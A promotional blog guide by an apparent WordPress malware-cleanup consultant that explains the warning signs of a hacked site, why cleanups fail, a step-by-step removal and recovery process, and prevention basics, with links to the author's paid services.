I’ve Fixed 4500+ Hacked Sites — Here’s What Most Website Owners Miss

After cleaning thousands of hacked WordPress websites, I can tell you one thing clearly: most site owners notice the problem too late. Not because the hack was invisible forever, but because the warning signs looked small at first. A slight traffic drop. A weird redirect. A spam page in Google. An unknown user account. By the time the problem becomes obvious, the malware has often already damaged rankings, trust, and revenue.

If you think your WordPress site may be hacked, this guide will help you spot the real warning signs, understand how these infections usually happen, and follow a safer cleanup process without making the situation worse.

If you need urgent help, start with my free WordPress malware scan or see my WordPress malware removal service.

Quick answer

A hacked WordPress site usually shows one or more of these signs: unexpected redirects, spam pages in Google, new admin users, modified files, browser security warnings, slow performance, or strange code in the database or plugin folders.

The safest recovery path is to confirm the infection, preserve a backup, inspect both files and database, remove the malicious code and persistence mechanisms, patch the original weakness, rotate passwords, and then deal with blacklist or SEO fallout.

Signs your WordPress site may be hacked

Not every hacked site gets a dramatic homepage defacement. In many cases, hackers want the site to look normal to the owner while it quietly serves spam, redirects, phishing pages, or malicious scripts behind the scenes.

• Sudden drop in traffic or rankings: Google may flag hacked content or stop trusting the site.
• Unexpected redirects: visitors land on casino, pharma, scam, or fake-login pages.
• Spam pages or weird URLs in Google: especially Japanese keyword spam, pharma spam, or gibberish URLs.
• Unknown admin users or plugin changes: a common sign of persistence after compromise.
• Unusual slowness or CPU spikes: malware can abuse server resources or send spam.
• Browser or Search Console warnings: “This site may be hacked,” phishing warnings, or security issue alerts.
• Modified core files or suspicious code: especially in wp-config.php, theme files, uploads, or mu-plugins.

If you are not yet sure whether the site is actually infected, read my full guide on how to detect WordPress malware before changing anything.

Why WordPress sites get hacked in the first place

WordPress itself is not usually the weakest point. Most compromises happen through the ecosystem around it: outdated plugins, vulnerable themes, stolen credentials, weak hosting hygiene, or risky software choices.

What website owners often miss

Most failed cleanups happen because the visible symptom gets removed, but the real persistence mechanism stays behind.

• They clean the homepage but not the whole server: malware often hides in uploads, fake plugins, cache paths, or mu-plugins.
• They skip the database: injected options, hidden users, cron events, and payloads can survive file cleanup.
• They restore a dirty backup: the infection comes right back.
• They forget SEO cleanup: spam URLs, hacked snippets, and blacklist warnings can remain after the malware is removed.
• They never patch the entry point: the same vulnerability stays open.

If you suspect the infection is hiding deeper than the files alone, read my guide on cleaning hidden malware from the WordPress database. If you see login anomalies or permission weirdness, this guide on hidden admin users in WordPress is also relevant.

How to remove WordPress malware safely

1. Preserve evidence and make an isolated backup

Before deleting anything, create a full backup of files and database and store it outside the server. This is not a backup to restore immediately. It is your forensic snapshot in case you need to review what changed, compare timestamps, or recover legitimate data.

2. Contact your host if the site is actively harmful or suspended

If visitors are being redirected, phishing pages are live, or your host has suspended the account, contact the hosting provider early. On shared hosting especially, they may see server-side abuse or neighboring-account issues you cannot see from WordPress alone.

3. Run both external and internal checks

Use an external scanner to catch obvious blacklist or homepage issues, then run a server-side scan inside WordPress to look for modified files and suspicious code. Online scanners are useful, but they cannot see every hidden file or database payload.

4. Inspect the highest-risk locations manually

Do not rely only on green checkmarks. Review these areas manually:

• wp-config.php
• active theme files, especially functions.php
• wp-content/plugins/
• wp-content/mu-plugins/
• wp-content/uploads/ for unexpected PHP files
• .htaccess and redirect rules

If your site keeps getting reinfected after you think it is clean, read why WordPress malware keeps coming back. That is usually a persistence problem, not bad luck.

5. Audit the database, users, and scheduled actions

Check for rogue admin accounts, suspicious options, injected JavaScript, cron-based reinfection, and strange content in key tables. A file-only cleanup is often incomplete.

6. Remove infected files and replace anything untrusted

Delete fake plugins, remove malicious code, and replace modified core, theme, or plugin files with clean copies from trusted sources. If you cannot verify a file confidently, do not assume it is safe just because the site still loads.

7. Patch the entry point

Cleaning the malware is not enough. You also need to close the hole that let the attacker in. That may mean updating or removing a vulnerable plugin, changing access controls, fixing file permissions, or removing abandoned software entirely.

8. Rotate passwords and invalidate old sessions

Change WordPress passwords, hosting credentials, SFTP/FTP passwords, database passwords, and security salts. If the attacker had any kind of authenticated access, this step matters.

9. Handle blacklist and SEO fallout

After technical cleanup, check Google Search Console for security issues, hacked content warnings, and indexed spam URLs. If the site was flagged publicly, cleanup is only part of the recovery. You may also need review requests, temporary removals, or a plan for deindexing spam URLs.

If that is your situation, my Google blacklist removal service and this case study on removing 10,500 spam URLs from Google will be useful next reads.

Can you clean a hacked WordPress site yourself?

Sometimes, yes. If the infection is simple, the entry point is obvious, and you know how to compare files, inspect the database, and verify the cleanup, a careful DIY recovery is possible.

But if the site is a business-critical asset, the infection keeps returning, Search Console is showing security warnings, or you are not sure what is malicious, DIY can become more expensive than expert cleanup. A partial fix often leads to reinfection, more SEO damage, or a failed review request.

How to prevent future hacks

• Keep WordPress core, plugins, and themes updated.
• Remove unused plugins, themes, and abandoned software.
• Use strong unique passwords and enable 2FA for admins.
• Use reputable hosting and keep backups outside the live server.
• Limit admin access and review user roles regularly.
• Monitor file changes, login activity, and Search Console alerts.
• Avoid nulled themes and plugins completely.
• Use HTTPS, sane file permissions, and a firewall or edge protection where appropriate.

These basics are not glamorous, but they prevent a large share of the compromises I see in real cleanup work.

When to hire a professional

You should bring in expert help if:

• the infection keeps coming back,
• you see spam pages or hacked URLs in Google,
• the site has unknown admin users or fake plugins,
• your host suspended the account,
• the site is redirecting visitors or showing phishing content,
• you already tried cleaning it and do not trust the result.

If that sounds familiar, you can hire me directly or browse more real-world malware cleanup case studies first.

Final thoughts

A hacked WordPress site is not just a technical problem. It is usually a business, trust, and SEO problem too. The sooner you identify the real infection path and remove it properly, the better your chances of avoiding reinfection and long-term ranking damage.

If your WordPress site is hacked, do not stop at the first suspicious file. Check the files, database, users, cron activity, SEO damage, and the original entry point. That is how you fix the problem instead of just hiding the symptom.

Need help now? Start with my free scan, review my background and experience, or hire me directly.

FAQ

How do I know if my WordPress site is hacked?

Common signs include redirects, spam pages in Google, security warnings, unknown users, modified files, unusual slowdowns, or strange code in your database or plugin folders.

What is the most common cause of WordPress hacks?

In real-world cases, outdated plugins and themes, weak passwords, vulnerable hosting environments, and nulled software are among the most common causes.

Can I just restore a backup?

Only if you are sure the backup is clean and the original entry point has been fixed. Restoring an infected or pre-compromise backup without patching the weakness can bring the malware back.

Why does WordPress malware keep coming back?

Usually because a persistence mechanism was missed, such as a hidden plugin, rogue admin user, cron job, database payload, or the original vulnerability itself.

How do I remove hacked URLs from Google?

First clean the site completely. Then review Search Console security issues, use temporary removals when appropriate, and make sure the hacked URLs return the correct response or are fully gone before expecting them to disappear from search.